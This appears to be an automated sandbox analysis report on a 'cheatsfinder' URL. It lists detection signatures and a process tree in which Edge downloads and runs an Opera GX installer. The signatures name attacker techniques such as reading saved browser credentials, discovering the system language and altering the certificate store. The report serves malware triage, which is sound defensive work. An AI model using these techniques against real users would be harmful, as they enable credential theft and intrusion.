Analysis

  • max time kernel
    360s
  • max time network
    370s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-09-2024 20:37

General

  • Target

    https://www.cheatsfinder.org/e5140e6

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cheatsfinder.org/e5140e6
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe59d46f8,0x7fffe59d4708,0x7fffe59d4718
      2⤵
        PID:1512
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
        2⤵
          PID:2324
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3064
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
          2⤵
            PID:2100
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
            2⤵
              PID:3476
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
              2⤵
                PID:1564
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                2⤵
                  PID:1488
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
                  2⤵
                    PID:1676
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3752
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
                    2⤵
                      PID:2808
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
                      2⤵
                        PID:3480
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
                        2⤵
                          PID:2964
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
                          2⤵
                            PID:3996
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
                            2⤵
                              PID:4336
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                              2⤵
                                PID:4008
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
                                2⤵
                                  PID:3112
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
                                  2⤵
                                    PID:3776
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
                                    2⤵
                                      PID:648
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
                                      2⤵
                                        PID:5284
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
                                        2⤵
                                          PID:5412
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
                                          2⤵
                                            PID:5488
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:1
                                            2⤵
                                              PID:5596
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:1
                                              2⤵
                                                PID:5676
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1824 /prefetch:1
                                                2⤵
                                                  PID:5164
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6532 /prefetch:8
                                                  2⤵
                                                    PID:5240
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1364 /prefetch:1
                                                    2⤵
                                                      PID:3776
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5968 /prefetch:8
                                                      2⤵
                                                        PID:4500
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6984 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5548
                                                      • C:\Users\Admin\Downloads\OperaGXSetup.exe
                                                        "C:\Users\Admin\Downloads\OperaGXSetup.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5412
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe
                                                          C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --server-tracking-blob=NDRlYWFiMGEwNDFlNWVlMGE1N2RhZDE5MjhjZWI3OGFmYzQ4MzVkZTI4NjRlOWUxNmM2MDdkYmM2ZjNhMDg4NDp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYUdYU2V0dXAuZXhlIiwicHJvZHVjdCI6Im9wZXJhX2d4IiwicXVlcnkiOiIvb3BlcmFfZ3gvc3RhYmxlL3dpbmRvd3M/ZWRpdGlvbj1zdGQtMiZ1dG1fc291cmNlPVBXTmdhbWVzJnV0bV9tZWRpdW09cGEmdXRtX2NhbXBhaWduPVBXTl9HQl9VVlJfMzczNiZlZGl0aW9uPXN0ZC0yJnV0bV9jb250ZW50PTM3MzZfJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZodHRwX3JlZmVycmVyPWh0dHBzJTNBJTJGJTJGd3d3Lm9wZXJhLmNvbSUyRmd4JTNGdXRtX3NvdXJjZSUzRFBXTmdhbWVzJTI2dXRtX21lZGl1bSUzRHBhJTI2dXRtX2NhbXBhaWduJTNEUFdOX0dCX1VWUl8zNzM2JTI2dXRtX2NvbnRlbnQlM0QzNzM2XyUyNnV0bV9pZCUzRDIzMDhjNjg5ZmU0MTRhYmQ5Mzk2MWI3OTJjNzMzMzA1JTI2ZWRpdGlvbiUzRHN0ZC0yJnV0bV9zaXRlPW9wZXJhX2NvbSZ1dG1fbGFzdHBhZ2U9b3BlcmEuY29tJTJGJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZkbF90b2tlbj02Nzg3NDQ2MCIsInRpbWVzdGFtcCI6IjE3MjYyNTk4ODQuMTg5MyIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85Mi4wLjQ1MTUuMTMxIFNhZmFyaS81MzcuMzYgRWRnLzkyLjAuOTAyLjY3IiwidXRtIjp7ImNhbXBhaWduIjoiUFdOX0dCX1VWUl8zNzM2IiwiY29udGVudCI6IjM3MzZfIiwiaWQiOiIyMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSIsImxhc3RwYWdlIjoib3BlcmEuY29tLyIsIm1lZGl1bSI6InBhIiwic2l0ZSI6Im9wZXJhX2NvbSIsInNvdXJjZSI6IlBXTmdhbWVzIn0sInV1aWQiOiI0YTllY2NkNi00MWQyLTQ3MWItOTllNi1hY2JjZGE2NDNiYjgifQ==
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Enumerates connected drives
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies system certificate store
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5896
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe
                                                            C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=113.0.5230.75 --initial-client-data=0x330,0x334,0x338,0x30c,0x33c,0x74091864,0x74091870,0x7409187c
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2628
                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5312
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=5896 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20240913203818" --session-guid=7ce49914-d5ac-40e5-849d-f6f67760cd60 --server-tracking-blob=ZTZkODZmY2FjMDZjYTVmMTNkZDcwN2U3NWUzMWJhZmQ2ODliNDJhZGYyYzA0ZDk2ODFlMDJmNDc2ZWFhN2MxNzp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYUdYU2V0dXAuZXhlIiwicHJvZHVjdCI6eyJuYW1lIjoib3BlcmFfZ3gifSwicXVlcnkiOiIvb3BlcmFfZ3gvc3RhYmxlL3dpbmRvd3M/ZWRpdGlvbj1zdGQtMiZ1dG1fc291cmNlPVBXTmdhbWVzJnV0bV9tZWRpdW09cGEmdXRtX2NhbXBhaWduPVBXTl9HQl9VVlJfMzczNiZlZGl0aW9uPXN0ZC0yJnV0bV9jb250ZW50PTM3MzZfJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZodHRwX3JlZmVycmVyPWh0dHBzJTNBJTJGJTJGd3d3Lm9wZXJhLmNvbSUyRmd4JTNGdXRtX3NvdXJjZSUzRFBXTmdhbWVzJTI2dXRtX21lZGl1bSUzRHBhJTI2dXRtX2NhbXBhaWduJTNEUFdOX0dCX1VWUl8zNzM2JTI2dXRtX2NvbnRlbnQlM0QzNzM2XyUyNnV0bV9pZCUzRDIzMDhjNjg5ZmU0MTRhYmQ5Mzk2MWI3OTJjNzMzMzA1JTI2ZWRpdGlvbiUzRHN0ZC0yJnV0bV9zaXRlPW9wZXJhX2NvbSZ1dG1fbGFzdHBhZ2U9b3BlcmEuY29tJTJGJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZkbF90b2tlbj02Nzg3NDQ2MCIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyNjI1OTg4NC4xODkzIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkyLjAuNDUxNS4xMzEgU2FmYXJpLzUzNy4zNiBFZGcvOTIuMC45MDIuNjciLCJ1dG0iOnsiY2FtcGFpZ24iOiJQV05fR0JfVVZSXzM3MzYiLCJjb250ZW50IjoiMzczNl8iLCJpZCI6IjIzMDhjNjg5ZmU0MTRhYmQ5Mzk2MWI3OTJjNzMzMzA1IiwibGFzdHBhZ2UiOiJvcGVyYS5jb20vIiwibWVkaXVtIjoicGEiLCJzaXRlIjoib3BlcmFfY29tIiwic291cmNlIjoiUFdOZ2FtZXMifSwidXVpZCI6IjRhOWVjY2Q2LTQxZDItNDcxYi05OWU2LWFjYmNkYTY0M2JiOCJ9 --desktopshortcut=1 --wait-for-package --initial-proc-handle=9809000000000000
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Enumerates connected drives
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2336
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=113.0.5230.75 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x71941864,0x71941870,0x7194187c
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3524
                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2524
                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe" --version
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5564
                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0x1d4f48,0x1d4f58,0x1d4f64
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5452
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6244 /prefetch:2
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5148
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
                                                        2⤵
                                                          PID:1544
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
                                                          2⤵
                                                            PID:5548
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6720 /prefetch:8
                                                            2⤵
                                                              PID:456
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6776 /prefetch:8
                                                              2⤵
                                                              • Modifies registry class
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1612
